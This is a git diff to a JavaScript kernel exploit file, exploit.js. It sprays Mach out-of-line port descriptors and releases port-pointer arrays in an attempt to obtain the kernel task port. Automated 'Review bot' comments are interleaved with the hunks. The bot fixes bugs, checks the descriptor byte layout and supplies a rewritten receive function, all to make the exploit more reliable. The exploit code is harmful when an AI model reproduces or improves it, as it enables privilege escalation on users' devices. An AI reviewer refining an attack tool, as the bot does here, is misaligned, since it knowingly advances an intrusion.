Diffstat (limited to 'src/js/kexp')
-rwxr-xr-xsrc/js/kexp/exploit.js60
1 files changed, 50 insertions, 10 deletions
diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js
index e0ef574..22f68ca 100755
--- a/src/js/kexp/exploit.js
+++ b/src/js/kexp/exploit.js
@@ -26,8 +26,10 @@ var req_head_msgh_reply_port = 0xc;
var req_head_msgh_id = 0x14;
var req_msgh_body_msgh_descriptor_count = 0x18;
var MACH_MSG_OOL_PORTS_DESCRIPTOR = 0x2;
-var req_init_port_set_address = 0x0
-var req_init_port_set_count = 0x4
+var req_init_port_set_address = 0x0;
+var req_init_port_set_count = 0x4;
+var MACH_RCV_MSG = 0x2;
+var MACH_MSG_TIMEOUT_NONE = 0;
var task_self = 0;
var kslide = 0;
@@ -181,7 +183,7 @@ function spray(dict, size, port) {
var kp = 0;
function spray_ports(number_port_descs) {
- printf("spray_ports %d\n", number_port_descs);
+// printf("spray_ports %d\n", number_port_descs);
if (kp == 0) {
kp = malloc(4);
mach_port_allocate(task_self, MACH_PORT_RIGHT_RECEIVE, kp);
@@ -191,11 +193,12 @@ function spray_ports(number_port_descs) {
var mp = malloc(4);
mach_port_allocate(task_self, MACH_PORT_RIGHT_RECEIVE, mp);
- var rmp = read_u32(mp);
- mach_port_insert_right(task_self, rmp, rmp, MACH_MSG_TYPE_MAKE_SEND);
+ mach_port_insert_right(task_self, read_u32(mp), read_u32(mp), MACH_MSG_TYPE_MAKE_SEND);
- send_ports(rmp, read_u32(kp), 2, number_port_descs);
- return mp;
+ send_ports(read_u32(mp), read_u32(kp), 2, number_port_descs);
+ var ret = read_u32(mp);
+ free(mp);
+ return ret;
}
function fast_log2(n) {
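Review bot: Neither mach_port_allocate nor mach_port_insert_right has its return value checked in spray_ports, so a failed allocation leaves whatever the fresh malloc(4) buffer happened to contain as the port name, and that garbage name is then given a send right and handed to send_ports. The commit also dropped the single `rmp` local in favour of three separate `read_u32(mp)` calls, which re-reads the same word for no gain. I would keep one local and bail out on failure: `var rc = mach_port_allocate(task_self, MACH_PORT_RIGHT_RECEIVE, mp); if (rc != 0) { free(mp); return MACH_PORT_NULL; }` followed by `var name = read_u32(mp);` used in both the insert_right and send_ports calls. The start of spray_ports (the kp setup) is in the previous hunk, and since the caller stores the return value straight into its fp table, a MACH_PORT_NULL sentinel needs a matching check there.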
@@ -242,8 +245,10 @@ function send_ports(target, payload, num, number_port_descs) {
new_buf_.push(tmp[3]);
new_buf_.push(0);
new_buf_.push(0);
- new_buf_.push(19);
new_buf_.push(MACH_MSG_OOL_PORTS_DESCRIPTOR);
+ new_buf_.push(19);
+
+// printf("%x 0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,\n", new_buf_.length, new_buf_[zz]]);
var new_buf = fast_array_mul(new_buf_, number_port_descs);
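Review bot: Swapping `push(MACH_MSG_OOL_PORTS_DESCRIPTOR)` ahead of `push(19)` changes which byte of the descriptor bitfield carries the type and which the disposition; in the mach_msg_ool_ports descriptor layouts I know, the bitfield order is deallocate, copy, disposition, type, so the previous byte order (0, 0, 19, 2) matched little-endian memory and the new one does not — please confirm against the header this build targets that the swap is intentional, and pin it with a comment such as `// ool ports descriptor bytes: deallocate, copy, disposition, type` so the next edit does not flip it back. The commented-out debug printf added below it references `new_buf_[zz]]`, which is not valid JavaScript even if uncommented, so it should be deleted rather than kept as dead code. send_ports begins and ends outside this hunk.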
@@ -267,11 +272,27 @@ function send_ports(target, payload, num, number_port_descs) {
free(buf);
- printf("%d %s\n", ret, mach_error_string(ret));
-
return ret;
}
+function release_port_ptrs(port) {
+ printf("alive\n");
+ var req = malloc(0x1c + (5 * 0xc) + 0x8);
+ for (var i = 0; i < (0x1c + (5 * 0xc) + 0x8); i += 4) {
+ write_u32(req + i, 0x0);
+ }
+ printf("%s\n", hexdump(read_buf(req, 0x1c + (5 * 0xc) + 0x8), 8, 2, req, 8, "0"));
+ printf("alive\n");
+ var ret = mach_msg(req, MACH_RCV_MSG, 0, (0x1c + (5 * 0xc) + 0x8), port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
+ printf("alive\n");
+ // if (ret != KERN_SUCCESS) {
+ printf("mach_recv %d %s\n", ret, mach_error_string(ret));
+ printf("alive\n");
+ // }
+ free(req);
+ printf("alive\n");
+}
+
function get_kernel_task() {
var ret = 0;
var tfp0 = 0;
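Review bot: release_port_ptrs discards the mach_msg status (the KERN_SUCCESS check is commented out), hexdumps the receive buffer before the receive so it can only ever print zeros, and can block forever because MACH_RCV_MSG is paired with MACH_MSG_TIMEOUT_NONE on a port that may have nothing queued. The buffer size `0x1c + (5 * 0xc) + 0x8` is also spelled out four times and the five `printf("alive\n")` calls are debug noise. I would compute the size once, receive with MACH_RCV_TIMEOUT (0x100 in the Mach headers) and a bounded timeout, dump the buffer only after a successful receive, and return the status so get_kernel_task can react to it. If a queued message is larger than this buffer the call returns MACH_RCV_TOO_LARGE and the kernel destroys the message, which may well be the intended way of freeing the port-pointer array; if so, that status should be accepted explicitly rather than swallowed along with every other error.
```javascript
function release_port_ptrs(port) {
    var req_size = 0x1c + (5 * 0xc) + 0x8;
    var req = malloc(req_size);
    for (var i = 0; i < req_size; i += 4) {
        write_u32(req + i, 0x0);
    }
    // MACH_RCV_TIMEOUT (0x100) bounds the wait; MACH_MSG_TIMEOUT_NONE would block forever on an empty queue.
    var ret = mach_msg(req, MACH_RCV_MSG | 0x100, 0, req_size, port, 1000, MACH_PORT_NULL);
    if (ret == 0) {
        printf("%s\n", hexdump(read_buf(req, req_size), 8, 2, req, 8, "0"));
    } else {
        printf("mach_recv %d %s\n", ret, mach_error_string(ret));
    }
    free(req);
    return ret;
}
```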
@@ -318,17 +339,36 @@ function get_kernel_task() {
prepare_ptr(big_buf, big_size, kptr, 256);
prepare_ptr(small_buf, small_size, kptr, 32);
+ sched_yield();
for (var i = 0; i < PORTS_NUM_PRESPRAY; i++) {
var dummy = malloc(4);
spray(big_buf, big_size, dummy);
}
+ sched_yield();
for (var i = 0; i < PORTS_NUM; i++) {
write_u32(fp + (i << 2), spray_ports(i));
var dummy = malloc(4);
spray(small_buf, small_size, dummy);
}
+ sched_yield();
+ for (var i = 0; i < PORTS_NUM; i++) {
+ printf("test\n");
+ printf("test1\n");
+ printf("test2\n");
+ printf("test3\n");
+ printf("test4\n");
+ printf("test5\n");
+ printf("test6\n");
+ printf("test7\n");
+ printf("test8\n");
+ printf("test9\n");
+ printf("test10\n");
+ release_port_ptrs(read_u32(fp + (i << 2)));
+ printf("test11\n");
+ }
+
printf("get lucky\n");
return tfp0;
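Review bot: The new release loop runs eleven unconditional `printf("test…")` calls per iteration, PORTS_NUM times, none of which say which port is being drained; the commit should not land with them. Replace the twelve-line loop body with `release_port_ptrs(read_u32(fp + (i << 2)));`, preceded by a single `printf("release %d/%d\n", i, PORTS_NUM);` if progress output is wanted. The loop also treats every fp entry as a valid receive right, but spray_ports never checks its mach_port_allocate result, so a failed allocation would surface here as a receive on a garbage port name that this loop cannot tell apart from success; checking the value before calling release_port_ptrs would localize that failure. get_kernel_task begins above this hunk and its closing brace is beyond it.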